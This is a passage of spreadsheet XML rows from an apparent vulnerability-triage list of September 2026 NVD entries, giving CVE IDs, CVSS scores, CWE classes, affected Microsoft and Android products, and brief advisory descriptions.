        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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9" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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02" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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03" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K40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04" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr">
        <is>
          <t>microsoft:vm_repair</t>
        </is>
      </c>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S407"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T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S408"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T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28572</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28583</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="S410"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T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28590</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S411"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T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="S412"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T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28594</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.001</v>
      </c>
